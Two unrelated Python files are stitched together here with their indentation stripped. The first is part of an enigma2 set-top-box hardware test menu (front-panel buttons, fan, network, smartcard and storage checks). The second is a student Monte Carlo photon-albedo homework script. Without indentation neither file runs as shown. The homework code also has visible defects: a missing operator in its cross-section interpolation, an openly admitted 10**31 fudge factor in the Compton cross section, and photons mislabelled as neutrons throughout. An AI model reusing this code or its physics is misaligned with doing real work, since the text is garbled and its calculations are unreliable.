config.Nims[0].advanced.sat[192].tonemode.value = tone
if self.has_1_tuner:
config.Nims[0].advanced.sat[200].tonemode.value = tone
else:
config.Nims[1].advanced.sat[200].tonemode.value = tone
nimmanager.sec.update()
if tone == "on":
self.changeMenuName("tone", "22Khz - [ON]/ OFF")
else:
self.changeMenuName("tone", "22Khz - ON /[OFF]")
# ---------------------------------------------------------------------
# fp, CODE IS DIRTY
# ---------------------------------------------------------------------
def frontButtonPass(self):
return
def frontButtonOk(self, pressed=True):
if not self.fpTestMode:
return
if not self.BUTTON_TEST.has_key("ok"):
return
if pressed:
self["button_ok"].show()
else:
self["button_ok"].hide()
self.BUTTON_TEST["ok"]["pressed"] = pressed
self.checkFpTestIsOk()
os.system("echo VFD START > /proc/stb/lcd/show_txt")
def frontButtonUp(self, pressed=True):
if not self.fpTestMode:
return
if not self.BUTTON_TEST.has_key("up"):
return
if not self.has_nav_keys:
return
if pressed:
self["button_up"].show()
else:
self["button_up"].hide()
self.BUTTON_TEST["up"]["pressed"] = pressed
self.checkFpTestIsOk()
def frontButtonDown(self, pressed=True):
if not self.fpTestMode:
return
if not self.BUTTON_TEST.has_key("down"):
return
if not self.has_nav_keys:
return
if not self.BUTTON_TEST.has_key("menu"):
os.system("echo VFD START > /proc/stb/lcd/show_txt")
if pressed:
self["button_down"].show()
else:
self["button_down"].hide()
self.BUTTON_TEST["down"]["pressed"] = pressed
self.checkFpTestIsOk()
def frontButtonLeft(self, pressed=True):
if not self.fpTestMode:
return
if not self.BUTTON_TEST.has_key("left"):
return
if not self.has_nav_keys:
return
if pressed:
self["button_left"].show()
else:
self["button_left"].hide()
self.BUTTON_TEST["left"]["pressed"] = pressed
self.checkFpTestIsOk()
def frontButtonRight(self, pressed=True):
if not self.fpTestMode:
return
if not self.BUTTON_TEST.has_key("right"):
return
if not self.has_nav_keys:
return
if pressed:
self["button_right"].show()
else:
self["button_right"].hide()
self.BUTTON_TEST["right"]["pressed"] = pressed
self.checkFpTestIsOk()
def frontButtonMenu(self, pressed=True):
if not self.fpTestMode:
return
if not self.BUTTON_TEST.has_key("ok"):
return
if pressed:
self["button_menu"].show()
else:
self["button_menu"].hide()
self.BUTTON_TEST["menu"]["pressed"] = pressed
self.checkFpTestIsOk()
os.system("echo VFD START > /proc/stb/lcd/show_txt")
def frontButtonExit(self, pressed=True):
if not self.fpTestMode:
return
if not self.BUTTON_TEST.has_key("exit"):
return
if pressed:
self["button_exit"].show()
else:
self["button_exit"].hide()
self.BUTTON_TEST["exit"]["pressed"] = pressed
self.checkFpTestIsOk()
def frontButtonPower(self, pressed=True):
if not self.fpTestMode:
return
if not self.BUTTON_TEST.has_key("power"):
return
if pressed:
self["button_power"].show()
else:
self["button_power"].hide()
self.BUTTON_TEST["power"]["pressed"] = pressed
self.checkFpTestIsOk()
def frontButtonChPlus(self, pressed=True):
if not self.fpTestMode:
return
if not self.BUTTON_TEST.has_key("right"):
return
if pressed:
self["button_right"].show()
else:
self["button_right"].hide()
self.BUTTON_TEST["right"]["pressed"] = pressed
self.checkFpTestIsOk()
def frontButtonChMinus(self, pressed=True):
if not self.fpTestMode:
return
if not self.BUTTON_TEST.has_key("left"):
return
if not self.BUTTON_TEST.has_key("menu"):
os.system("echo VFD START > /proc/stb/lcd/show_txt")
if pressed:
self["button_left"].show()
else:
self["button_left"].hide()
self.BUTTON_TEST["left"]["pressed"] = pressed
self.checkFpTestIsOk()
def frontButtonVolUp(self, pressed=True):
if not self.fpTestMode:
return
if not self.BUTTON_TEST.has_key("up"):
return
if pressed:
self["button_up"].show()
else:
self["button_up"].hide()
self.BUTTON_TEST["up"]["pressed"] = pressed
self.checkFpTestIsOk()
def frontButtonVolDown(self, pressed=True):
if not self.fpTestMode:
return
if not self.BUTTON_TEST.has_key("down"):
return
if pressed:
self["button_down"].show()
else:
self["button_down"].hide()
self.BUTTON_TEST["down"]["pressed"] = pressed
self.checkFpTestIsOk()
def frontButtonInfo(self, pressed=True):
if not self.fpTestMode:
return
if not self.BUTTON_TEST.has_key("info"):
return
if not self.has_key("button_info"):
return
if pressed:
self["button_info"].show()
else:
self["button_info"].hide()
self.BUTTON_TEST["info"]["pressed"] = pressed
self.checkFpTestIsOk()
def fpTestQuit(self):
self.changeMenuName("fp", "FRONT PANEL")
self.fpTestMode = False
os.system("echo ^0^ > /proc/stb/lcd/show_txt")
def checkFpTestIsOk(self):
exit = True
for button in self.BUTTON_TEST:
if not self.BUTTON_TEST[button]["pressed"]:
exit = False
break
if exit:
for button in self.BUTTON_TEST:
self[self.BUTTON_TEST[button]["button"]].setForegroundColorNum(1)
self.changeMenuName("fp", "FRONT PANEL - OK")
self.fpTestMode = False
os.system("echo '^0^' > /proc/stb/lcd/show_txt")
def vfdOn(self, on):
fp = open('/dev/dbox/lcd0', 'w')
fcntl.ioctl(fp.fileno(), 0x123321, on)
def vfdTextWrite(self, text):
return
if self.has_vfd:
if os.path.exists('/proc/stb/lcd/show_txt'):
open('/proc/stb/lcd/show_txt', 'w').write(text)
def fpTest(self):
if self.fpTestMode:
return
self.fpTestMode = True
self.changeMenuName("fp", " \"PRESS FRONT BUTTONS(RED TO QUIT)\"")
os.system("echo VFD START > /proc/stb/lcd/show_txt")
for button in self.BUTTON_TEST:
self.BUTTON_TEST[button]["func"](False)
self[self.BUTTON_TEST[button]["button"]].setForegroundColorNum(0)
# ---------------------------------------------------------------------
# fan
# ---------------------------------------------------------------------
def setFan(self, power):
if power == "on":
self.changeMenuName("fan", "FAN - [ON]/ OFF")
fancontrol.setPWM(0, 255)
else:
self.changeMenuName("fan", "FAN - ON /[OFF]")
fancontrol.setPWM(0, 0)
# ---------------------------------------------------------------------
# deep standby
# ---------------------------------------------------------------------
def deepStandby(self):
self.session.openWithCallback(self.deepStandbyConfirmed, MessageBox, _("Do you really want to go to Deep Standby?"), default = True)
def deepStandbyConfirmed(self, answer):
if answer:
self.quit(1)
# ---------------------------------------------------------------------
# lan check
# ---------------------------------------------------------------------
def getLinkState(self):
try:
iNetwork.getLinkState(self.iface, self.dataAvail)
except:
pass
def dataAvail(self, data):
self.LinkState = None
for line in data.splitlines():
line = line.strip()
if 'Link detected:' in line:
if "yes" in line:
self.LinkState = True
else:
self.LinkState = False
if self.LinkState == True:
iNetwork.checkNetworkState(self.checkNetworkCB)
else:
self["lan_s"].setText(_(" N/A"))
self["lan_s"].setForegroundColorNum(0)
self.networkMonitor.start(1000, True)
def checkNetworkCB(self,data):
try:
if iNetwork.getAdapterAttribute(self.iface, "up") is True:
if self.LinkState is True:
if data <= 2:
ip = NoSave(ConfigIP(default=iNetwork.getAdapterAttribute(self.iface, "ip")) or [0,0,0,0]).getText()
if ip == "0.0.0.0":
self.networkMonitor.stop()
self.restartLan()
self["lan_s"].setText(_(" Getting..."))
self["lan_s"].setForegroundColorNum(0)
return
self["lan_s"].setText(_(" %s") % ip)
self["lan_s"].setForegroundColorNum(1)
else:
self["lan_s"].setText(_(" N/A"))
self["lan_s"].setForegroundColorNum(0)
else:
self["lan_s"].setText(_(" N/A"))
self["lan_s"].setForegroundColorNum(0)
else:
self["lan_s"].setText(_(" N/A"))
self["lan_s"].setForegroundColorNum(0)
self.networkMonitor.start(1000, True)
except:
pass
def restartLan(self):
iNetwork.restartNetwork(self.restartLanDataAvail)
def restartLanDataAvail(self, data):
if data is True:
iNetwork.getInterfaces(self.getInterfacesDataAvail)
def getInterfacesDataAvail(self, data):
if data is True:
self.networkMonitor.start(1000, True)
# ---------------------------------------------------------------------
# smartcard check
# ---------------------------------------------------------------------
def getSCInfo(self, slot = 0):
card = "N/A"
device = open("/dev/sci%d" % slot, "rw")
try:
fcntl.ioctl(device.fileno(), 0x80047301)
atr = device.read()
for atrHead in self.CARD_LIST.keys():
if atr.startswith(atrHead):
card = self.CARD_LIST[atrHead]
except:
card = "Unknown"
return card
def checkSCSlot(self, slot = 0):
inserted = array.array('h', [0])
try:
device = open("/dev/sci%d" % slot, "rw")
except:
os.system("/etc/init.d/softcam stop; /etc/init.d/cardserver stop")
return False
fcntl.ioctl(device.fileno(), 0x80047308, inserted, 1)
device.close()
return inserted[0]
def getSCState(self):
for slot in (0, 1):
if os.path.exists("/dev/sci%d" % slot):
if self.checkSCSlot():
if not self.smartcardInserted[slot]:
scInfo = self.getSCInfo(slot)
self["sc%d_s" % slot].setText(_(" %s" % scInfo))
if scInfo != "Unknown":
self["sc%d_s" % slot].setForegroundColorNum(1)
else:
self["sc%d_s" % slot].setForegroundColorNum(0)
self.smartcardInserted[slot] = True
else:
if self.smartcardInserted[slot]:
self["sc%d_s" % slot].setText(_(" N/A"))
self["sc%d_s" % slot].setForegroundColorNum(0)
self.smartcardInserted[slot] = False
else:
self["sc%d_i" % slot].hide()
self["sc%d_s" % slot].hide()
# ---------------------------------------------------------------------
# ci check
# ---------------------------------------------------------------------
def getCIState(self):
for slot in (0, 1):
if os.path.exists("/dev/ci%d" % slot):
state = eDVBCI_UI.getInstance().getState(slot)
if state == 1:
self["ci%d_s" % slot].setText(_(" Getting..."))
self["ci%d_s" % slot].setForegroundColorNum(0)
elif state == 2: #module ready
self["ci%d_s" % slot].setText(_(" %s" % eDVBCI_UI.getInstance().getAppName(slot)))
self["ci%d_s" % slot].setForegroundColorNum(1)
eDVBCI_UI.getInstance().stopMMI(slot)
else:
self["ci%d_s" % slot].setText(_(" N/A"))
self["ci%d_s" % slot].setForegroundColorNum(0)
else:
self["ci%d_i" % slot].hide()
self["ci%d_s" % slot].hide()
# ---------------------------------------------------------------------
# usb, sata check
# ---------------------------------------------------------------------
def getStorageState(self):
storageFound = {}
try:
for hd in harddiskmanager.HDDList():
if "Internal" in hd[1].bus():
storageFound["sata_s"] = hd[1].model()
else:
for realpath in self.USBDB[HardwareInfo().get_device_name()]:
if realpath in os.path.realpath('/sys/block/' + hd[1].device[:3] + '/device')[4:]:
storageFound["usb%d_s" % self.USBDB[HardwareInfo().get_device_name()][realpath]] = hd[1].model()
except:
return
for storage in ("sata_s", "usb0_s", "usb1_s", "usb2_s"):
if storageFound.has_key(storage):
self[storage].setText(_(" %s" % storageFound[storage]))
self[storage].setForegroundColorNum(1)
else:
self[storage].setText(_(" N/A"))
self[storage].setForegroundColorNum(0)
# ---------------------------------------------------------------------
# mac address check
# ---------------------------------------------------------------------
def getMacaddress(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', self.iface[:15]))
return ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
# ---------------------------------------------------------------------
# micom version check
# ---------------------------------------------------------------------
def getMicomVersion(self):
if HardwareInfo().has_micom():
return about.getMicomVersionString()
else:
return "N/A"
# ---------------------------------------------------------------------
# security chip check
# ---------------------------------------------------------------------
def checkSecurityChip(self):
fp = open('/dev/dbox/fp0', 'w')
try:
return fcntl.ioctl(fp.fileno(), 0x417)
except:
return 0xf
# ---------------------------------------------------------------------
# fan status check
# ---------------------------------------------------------------------
def initFanSensors(self):
templist = sensors.getSensorsList(sensors.TYPE_TEMPERATURE)
tempcount = len(templist)
fanlist = sensors.getSensorsList(sensors.TYPE_FAN_RPM)
fancount = len(fanlist)
for count in range(8):
if count < tempcount:
id = templist[count]
self["SensorTempText%d" % count] = StaticText(sensors.getSensorName(id))
self["SensorTemp%d" % count] = SensorSource(sensorid = id)
else:
self["SensorTempText%d" % count] = StaticText("")
self["SensorTemp%d" % count] = SensorSource()
if count < fancount:
id = fanlist[count]
self["SensorFanText%d" % count] = StaticText(sensors.getSensorName(id))
self["SensorFan%d" % count] = SensorSource(sensorid = id)
else:
self["SensorFanText%d" % count] = StaticText("")
self["SensorFan%d" % count] = SensorSource()
|
pli3/enigma2-git
|
lib/python/Screens/TestMenu.py
|
Python
|
gpl-2.0
| 43,638
|
#!/usr/bin/python
# Creator: Daniel Wooten
# NE255 HW4 P3 MC Code
import logging as logging
import time as time
import sys as sys
import numpy as np
import math as math
import pylab as pl
import csv as csvreader
import mpmath as mp
#This sets the precision for mpmath (extended precision python)
mp.dis = 70
# Function, refer to docstring for purpose
def cep():
''' A wrapper to place file seperators in a log file for the
debug level '''
logging.debug( "*****************************************************" )
return()
#Function, refer to docstring for purpose
def sep():
'''A wrapper to visually seperate functions in log files'''
logging.debug( '//////////////////////////////////////////////////////' )
return()
# Let the user know that the code is running
print "*****************************************************"
print "Photon CODE BEGIN!"
#Take in the number of samples
N = int( raw_input('Please input the number of samples\n') )
#Here we will intake data for the photon cross sections
csvfile = open( 'raw_xs.txt' , 'r' )
reader = csvreader.reader( csvfile )
array = []
for row in reader:
array.append( row )
att_array = np.zeros( ( len( array ) , 3 ) )
for row in range( len( array ) ):
for column in range( len( array[ row ] ) ):
att_array[ row ][ column ] = float( array[ row ][ column ] )
#Define the number of spatial bins
h = 10
#Define cell length
cell_length = 5.0 / float( h )
#Lets initilize our holding arrays
collisions = np.zeros( h )
absorptions = np.zeros( h )
leak_array = np.zeros( 2 )
# File names for the log and output files respectively
LogFileName = 'logfile.dat'
OutputFile = 'output.dat'
#Set the log level
LogLevel = 0
# This does some basic config on the log file
logging.basicConfig( filename = LogFileName , format = \
"[%(levelname)8s] %(message)s" , filemode =\
'w' , level = LogLevel )
logging.debug( "This is the debug level reporting in" )
logging.info( "This is the info level reporting in " )
logging.warning( "This is the warning level reporting in" )
logging.error( "This is the error level reporting in" )
logging.critical( "This is the critical level reporting in" )
logging.debug( 'The number of samples being run is ' + str(N) )
if LogLevel <= 10:
sep()
logging.debug( 'The cross sections array is: ' )
cep()
for row in range( len( att_array ) ):
logging.debug( str( att_array[ row ] ) )
#This function will follow the lifespan of one neutron
def Lifetime( col_counter , abs_counter , leak_counter , xs , \
cell_width , start_pos , angle , \
distance , leakage , collide , col_type , \
location , new_angle , xs_data , cep , sep ):
'''This function caries a neutron through its lifespan'''
sep()
logging.debug( 'Starting new neutron history' )
#This is a boolean that will help us track life/death
alive = True
cep()
logging.debug( 'Neutron is alive: ' + str( alive ) )
#This is a boolean that will help us track leakage
inside = True
cep()
logging.debug( 'Neutron is inside: ' + str( inside ) )
#Start the neutron off with a position and an angle and energy
pos = start_pos( cep , sep )
cep()
logging.debug( 'Neutron is starting at: ' + str( pos ) )
mu = angle( cep , sep )
cep()
logging.debug( 'Neutron has angle: ' + str( mu ) )
eng = 2.0
cep()
logging.debug( 'Neutron has energy: ' + str( eng ) )
#Counter for number of loops
num_col = 0
#Initilize the count variable
count = 0
#Here we begin the tracking loop
#While the neutron is both not absorbed and not leaked
while ( inside and alive ):
cep()
logging.debug( 'Tracking collision number: ' + str( num_col ) )
#Determine the photon cross sections
xs_array = xs( xs_data , eng , cep , sep )
#Get the total distance traveled
dis = distance( xs_array[ 0 ] , cep , sep )
cep()
logging.debug( 'Neutron is traveling distance: ' + \
str( dis ) )
cep()
logging.debug( 'Projected distance is: ' + str( dis * mu ) )
#Project onto the x axis
old_pos = pos
pos = pos + dis * mu
cep()
logging.debug( 'New position is: ' + str( pos ) )
#Check for scoring albedo
logging.debug( 'num_col is: ' + str( num_col ) )
if num_col > 0 and num_col < 2:
logging.debug( 'Tripped' )
count = score( mu , pos , eng , \
count, old_pos , cep , sep )
#Check for leakage
cep()
logging.debug( 'Checking for leakage' )
inside = leakage( pos , leak_counter , inside , cep , sep )
logging.debug( 'Neutron is inside: ' + str( inside ) )
logging.debug( 'Neutron is alive: ' + str( alive ) )
#If the neutron didn't leak, collide it
cep()
logging.debug( 'Colliding neutron if alive:' )
logging.debug( 'Parameters before collision: ' )
logging.debug( 'Incoming angle is: ' + str( mu ) )
logging.debug( 'Incoming energy is: ' + str( eng ) )
if alive and inside:
res = collide( pos , mu , col_counter, \
abs_counter , \
alive, angle , col_type , location , xs_array , cell_width\
, new_angle , eng , cep , sep )
alive = res[ 0 ]
mu = res[ 1 ]
eng = res[ 2 ]
cep()
logging.debug( 'Neutron parameters post collision: ' )
logging.debug( 'Outgoing angle is: ' + str( mu ) )
cep()
logging.debug( 'Neutron is alive: ' + str( alive ) )
logging.debug( 'Neutron is inside: ' + str( inside ) )
#Increment the collision number
num_col += 1
logging.debug( str( num_col ) )
cep()
logging.debug( 'Albedo for this photon is: ' + str( count ) )
logging.debug( 'Terminating neutron history' )
sep()
return( count )
#This function will score our albedo
def score( angle , place , energy , alb , old_place , cep , sep ):
'''This function will score our albedo'''
sep()
logging.debug( 'Entering the score function' )
#Set default value
mark = 0
cep()
logging.debug( 'Angle has value: ' + str( angle ) )
logging.debug( 'Place has value: ' + str( place ) )
logging.debug( 'P > ' + str( old_place / angle ) )
if angle < 0.0 and place >= abs( old_place / angle ):
mark = energy * abs( angle )
cep()
logging.debug( 'mark has value: ' + str( mark ) )
cep()
logging.debug( 'Leaving the score function' )
sep()
return( mark )
#This function will determine photon cross sections
def xs( data , energy , cep , sep ):
'''This function will determine photon cross sections'''
sep()
logging.debug( 'Entering the xs function' )
#Init the storage array
cs_array = np.zeros( 3 )
#Here we define the concreate density
rho = 2.3
#Here we define a rough electron density
e_den = mp.mpf( 3 * 10**( 23 ) * 100**3 )
#Here we define the speed of light, planks const, and electron mass
plank = mp.mpf( 6.626 * 10**( -34 ) )
qo = mp.mpf( 1.602 * 10**( -19 ) )
light = mp.mpf( 3.0 * 10**( 8 ) )
mass = mp.mpf( 9.109 * 10**( -31 ) )
#Set the energy as an extended precision number
eng = mp.mpmathify( energy )
eng = eng * 10**( -13 )
#Get the frequency
v = eng / plank
#This is a fudge factor to get the compton xs to be close to realistic
f = 10**(31)
#Here we calculate the compton cross section
radius = qo**4 / ( mass * light**2 )
alpha = ( eng ) / ( mass * light**2 )
cs_xs = 2 * mp.pi * radius * ( ( ( 1.0 + alpha ) \
/ ( alpha**2 ) ) * ( ( ( 2.0 * ( 1.0 + alpha ) \
) / ( 1.0 + 2.0 * alpha ) ) - ( 1.0 / alpha ) * \
( mp.log( 1.0 + 2.0 * alpha ) ) ) + ( ( 1.0 / \
( 2.0 * alpha ) ) * mp.log( 1.0 + 2.0 * alpha ) - \
( ( 1.0 + 3.0 * alpha ) / ( 1.0 + 2.0 * alpha )**2 ) ) )
cep()
logging.debug( 'The micro cs xs is: ' + mp.nstr( \
cs_xs , n = 10 ) )
mu_cs = cs_xs * e_den * f
logging.debug( 'The macro cs xs is: ' + mp.nstr( \
mu_cs , n = 10 ) )
cs_array[ 1 ] = float( mp.nstr( mu_cs , n = 10 ) )
#Now we will determine, via linear interp, the total xs
cep()
logging.debug( 'Energy of photon is: ' + str( energy ) )
if energy <= data[ 0 , 0 ]:
logging.debug( 'Lowest energy point is: ' + \
str( data[ 0 , 0 ] ) )
logging.debug( 'Xs at lowest energy is: ' + \
str( data[ 0 , 1 ] ) )
cs_array[ 0 ] = ( ( data[ 1 , 1 ] - data[ 0 , 1 ] ) \
( data[ 1 , 0 ] - data[ 0 , 0 ] ) ) * ( \
data[ 0 , 0 ] - energy ) - data[ 0 , 1 ]
logging.debug( 'Calculated XS is: ' + \
str( cs_array[ 0 ] ) )
else:
for row in range( len( data ) - 1 ):
index = row + 1
if energy <= data[ index , 0 ]:
logging.debug( 'Energy of photon is: '\
+ str( energy ) )
logging.debug( 'Energy of lower XS is: ' \
+ str( data[ index - 1 , 0 ] ) )
logging.debug( 'Energy of higher XS is: ' \
+ str( data[ index , 0 ] ) )
logging.debug( 'Lower XS is: ' + \
str( data[ index -1 , 1 ] ) )
logging.debug( 'Higher XS is: ' +
str( data[ index , 1 ] ) )
cs_array[ 0 ] = ( ( data[ index , 0 ] - \
data[ index - 1 , 0 ] ) / ( \
data[ index , 1 ] - data[ index - 1 , 1 ] \
) ) * ( data[ index , 0 ] - energy ) + \
data[ index -1 , 1 ]
logging.debug( 'Calculated XS is: ' + \
str( cs_array[ 0 ] ) )
break
#Multiply by rho
cs_array[ 0 ] = cs_array[ 0 ] * rho
cs_array[ 2 ] = cs_array[ 0 ] - cs_array[ 1 ]
cep()
logging.debug( 'The cs_array is: ' + str( cs_array ) )
logging.debug( 'Leaving the xs function' )
sep()
return( cs_array )
#This function will handle colliding neutrons
def collide( position , MU , col , absor , existance , angle \
, col_type , location , cs , width , new_angle \
, energy , cep , sep ):
'''This function collides neutrons and hanldes the aftermath'''
sep()
logging.debug( 'Entering the colision routine' )
#holder array
holder = [ True , MU , energy ]
#Determine the type of collision
collision = col_type( cs , cep , sep )
cep()
logging.debug( 'Collision of type: ' + str( collision ) )
#Determine the spatial bin this occured in
spatial_bin = location( position , width , cep , sep )
cep()
logging.debug( 'Spatial bin of: ' + str( spatial_bin ) )
#If the collision was a scatter
if collision > 0:
cep()
logging.debug( 'Collision was a scatter' )
#Tabulate the collision
cep()
logging.debug( 'Collision count before tabulation: ' )
logging.debug( 'Spatial bin: ' + str( spatial_bin ) \
+ ' has ' + str( col[ spatial_bin ] ) )
col[ spatial_bin ] += 1
logging.debug( 'Collision count in bin ' + \
str( spatial_bin ) + ' now: ' + \
str( col[ spatial_bin ] ) )
#Get a new angle post scatter
cep()
logging.debug( 'Incoming angle: ' + str( MU ) )
logging.debug( 'Incoming energy is: ' +str( energy ) )
out = compton( MU , energy , cep , sep )
MU = out[ 0 ]
holder[ 1 ] = MU
energy = out[ 1 ]
holder[ 2 ] = energy
cep()
logging.debug( 'Outgoing angle: ' + str( MU ) )
logging.debug( 'Outgoing energy is: ' + str( energy ) )
#If the collision was an abosrption
else:
#Tabulate the absorption
cep()
logging.debug( 'Collision was an absorption' )
logging.debug( 'Abs count in bin ' + str( spatial_bin ) \
+ ' is: ' + str( absor[ spatial_bin ] ) )
absor[ spatial_bin ] += 1
logging.debug( 'Count is now: ' + str( absor[ spatial_bin ] ) )
#And "kill" the nuetron
holder[ 0 ] = False
cep()
logging.debug( 'Neutron is now alive: ' + str( existance ) )
logging.debug( 'Leaving the collision function' )
sep()
return( holder )
#This function calculates an outgoing angle post scattering
def new_angle( incoming , x_sec , energy , cep , sep ):
'''This function calculates an outgoing compton angle and energy'''
sep()
logging.debug( 'Entering the new_angle function' )
#We define the average scattering angle
mu_bar = x_sec[ 2 ] / x_sec[ 1 ]
#Calculate the new mu post scattering
new_mu = -1 + math.sqrt( 1 - 3 * incoming * mu_bar * ( \
2 * ( 1 - 2 * np.random.random(1) ) -3 * incoming * \
mu_bar ) ) / ( 3 * incoming * mu_bar )
cep()
logging.debug( 'Outgoing angle is: ' + str( new_mu ) )
logging.debug( 'Leaving the new_angle function' )
sep()
return( new_mu )
#This function will sample the photon energy in compton scattering
def compton( old_angle , energy , cep , sep ):
'''This function samples the compton scattering energy for a photon'''
sep()
logging.debug( 'Entering the compton function' )
#Init our out array
out = np.zeros( 2 )
#Define some constants
#plank = mpf( 6.626 * 10**( -34 ) )
#light = mpf( 3.0 * 10**( 8 ) )
#mass = mpf( 9.109 * 10**( -31 ) )
#Get our lambda ( may need adjusting )
#lam = ( mass * light**2 ) / ( energy / plank )
lam = 0.511 / energy
#logging.debug( 'Lambda is: ' + mp.nstr( lam , n = 10 ) )
logging.debug( 'Lambda is: ' + str( lam ) )
#lam = float( mp.nstr( lam , n = 10 ) )
#Enter the x selection algorithm
while out[ 1 ] == 0 :
#Generate our three random numbers
nums = np.random.random( 3 )
if nums[ 0 ] <= ( ( lam + 2.0 ) / ( 9.0 * lam + 2.0 ) ):
x1 = 1.0 + 2.0 * nums[ 1 ] / lam
if nums[ 2 ] <= 4.0 * ( 1.0 / x1 - 1.0 / x1**2 ):
out[ 1 ] = 0.511 / ( x1 * lam )
else:
x1 = ( lam + 2.0 ) / ( lam + 2.0 * nums[ 1 ] )
if nums[ 2 ] <= 0.5 * ( ( lam - lam * x1 + 1.0 )**2 \
+ 1.0 / x1 ):
out[ 1 ] = 0.511 / ( x1 * lam )
cep()
logging.debug( 'Old energy: ' + str( energy ) )
logging.debug( 'New energy: ' + str( out[ 1 ] ) )
#Generate and store outgoing angle
out[ 0 ] = math.cos( math.acos( old_angle ) + \
math.acos( 1.0 - lam * ( x1 - 1.0 ) ) )
logging.debug( 'Old angle: ' + str( old_angle ) )
logging.debug( 'New angle: ' + str( out[ 0 ] ) )
logging.debug( 'Leaving the compton function' )
sep()
return( out )
#This function determines in which spatial bin an interaction occurs
def location( place , bin_width , cep , sep ):
'''This function determines in which bin an interaction occurs'''
sep()
logging.debug( 'Entering the location function' )
cell = int( math.floor( place / float( bin_width ) ) )
logging.debug( 'Cell is: ' + str( cell ) )
logging.debug( 'Leaving the location function' )
sep()
return( cell )
#This function will determine if the neutron leaked
def leakage( location , leak_array , present , cep , sep ):
'''This function tracks leakage'''
sep()
logging.debug( 'Entering the leakage function ' )
logging.debug( 'Location is: ' + str( location ) )
logging.debug( 'Left leakage is: ' + str( leak_array[ 0 ] ) )
logging.debug( 'Right leakage is: ' + str( leak_array[ 1 ] ) )
if location > 5.0: present = False ; leak_array[ 1 ] += 1
if location < 0.0: present = False ; leak_array[ 0 ] += 1
cep()
logging.debug( 'Neutron is inside: ' + str( present ) )
logging.debug( 'Left leakage is: ' + str( leak_array[ 0 ] ) )
logging.debug( 'Right leakage is: ' + str( leak_array[ 1 ] ) )
logging.debug( 'Leaving the leakage function' )
sep()
return( present )
#This function determines the collision type
def col_type( csx_array , cep , sep ):
'''Ths function determines the collision type'''
#Random number between 0 and 1
sep()
logging.debug( 'Entering the col_type function' )
quanta = np.random.random( 1 )
cep()
logging.debug( 'Collision random is: ' + str( quanta ) )
#If said rand num is less than the ratio of the abs
# cross section to the total, the collision
# was an absorption
logging.debug( 'Threshold for abs is: ' + \
str( csx_array[ 2 ] / csx_array[ 0 ] ) )
cep()
if quanta <= csx_array[ 2 ] / csx_array[ 0 ]:
col_type = int( 0 )
logging.debug( 'Collision type is: ' +\
str( col_type ) )
#Otherwise it was a scatter
else:
col_type = int( 1 )
logging.debug( 'Collision type is: ' +\
str( col_type ) )
logging.debug( 'Leaving the col_type function' )
sep()
return( col_type )
#This function generates a start position for our neutron
def start_pos( cep , sep ):
'''This function generates a start pos for our neutron'''
sep()
logging.debug( 'Entering the start_pos function' )
pos = 0.0
cep()
logging.debug( 'The starting position is ' + str( pos ) )
logging.debug( 'Leaving the start_pos function' )
sep()
return( pos )
#This function generates a random angle on (-1,1)
def angle( cep , sep ):
'''This function doesn't do much for photons'''
sep()
logging.debug( 'Entering the angle function' )
ang = 1.0
logging.debug( 'Leaving the angle function' )
sep()
return( ang )
#This function will give us the distance our neutron travels
def distance( xs , cep , sep ):
'''This function calculates distance to next collision'''
sep()
logging.debug( 'Entering the distance function' )
dis = -np.log( np.random.random( 1 ) ) / xs
logging.debug( 'The calculated distance is ' + str( dis ) )
logging.debug( 'Leaving the distance function' )
sep()
return( dis )
#This function will calculate the flux distribution based
# on the collision flux estimator
def flux_collision( col_array , abs_array , num_part , cell_width, \
num_bins , xs_array, cep , sep ):
'''This function will calculate the collision estimated flux
as well as its error and write these to csv files '''
sep()
logging.debug( 'Entering the flux_collision function' )
#Define total interaction array
cep()
logging.debug( 'Interactions array: ' )
interactions = col_array + abs_array
logging.debug( str( interactions ) )
#Initialize the phi array
phi = np.zeros( ( 2 , num_bins ) )
#Calculate collision flux
cep()
logging.debug( 'First phi array: ' )
phi[ 0 ] = ( interactions ) / ( xs_array[ 0 ] * \
float( cell_width ) * float( num_part ) )
logging.debug( str( phi[ 0 ] ) )
#Store non-normalized flux
nn_phi = phi[ 0 ]
#Normalize collision flux
cep()
logging.debug( 'Normalized phi array' )
phi[ 0 ] = phi[ 0 ] / sum( phi[ 0 ] )
logging.debug( str( phi[ 0 ] ) )
#Calculate estimated mean
cep()
logging.debug( 'est mean array: ' )
est_mean = ( interactions ) / float( num_part )
logging.debug( str( est_mean ) )
#We pull sig_t out of the array (causing problems with np)
Tsig = xs_array[ 0 ]
cep()
logging.debug( 'Tsig: ' + str( Tsig ) )
#Calculate phi error
phi[ 1 ] = np.sqrt( ( np.square( interactions - est_mean ) ) / \
( float( num_part - 1 ) * float( num_part ) \
* ( float ( Tsig ) * float( cell_width ) * float( num_part ) ) ) )
cep()
logging.debug( str( ( float( num_part - 1 ) * float( num_part ) \
* ( float ( Tsig ) * float( cell_width ) * float( num_part ) ) ) ) )
logging.debug( 'First phi error array: ' )
logging.debug( str( phi[ 1 ] ) )
#Store error associated with the sum of the nn_phi array
sum_error = math.sqrt( sum( np.square( phi[ 1 ] ) ) )
#Calculate the normalized flux error
phi[ 1 ] = np.sqrt( ( np.square( phi[ 1 ] ) / np.square( sum( nn_phi ) ) ) \
+ ( np.square( nn_phi ) / ( sum( nn_phi )**2 ) ) * \
sum_error**2 )
cep()
logging.debug( 'Normalized phi error array: ' )
logging.debug( str( phi[ 1 ] ) )
cep()
logging.debug( 'Leaving the flux_collision function' )
sep()
return( phi )
#This function will calculate the abs rate in slab halves
def abs_half_cells( abs_array , num_part , cep , sep ):
'''This function calculates abs rates and probabilities in
half-cells'''
sep()
logging.debug( 'Entering the abs_half_cell function' )
#Array index of right end of left half of cell
h_index = len( abs_array ) / 2 - 1
logging.debug( 'Index of right end of left cell:' \
+ str( h_index ) )
#Initilize the array
abs_report = np.zeros( ( 4 , 2 ) )
#Get total absoprtions
total_abs = float( sum( abs_array ) )
#Get abs, per cell, estimated mean
abs_m = abs_array / float( num_part )
#Get abs var
abs_v = ( abs_array - abs_m )**2 / ( \
float( num_part + 1 ) * float( num_part ) )
#Get abs s.error
abs_e = np.sqrt( abs_v )
#Get error of left half sum
abs_e_l = math.sqrt( sum( abs_v[ 0 : h_index ] ) )
#Get error of right half sum
abs_e_r = math.sqrt( sum( abs_v[ h_index + 1 : ] ) )
#Get error of total sum
abs_s_e = math.sqrt( sum( abs_v ) )
#Get abs rate in left half
abs_report[ 0 , 0 ] = sum( abs_array[ 0 : h_index ] )
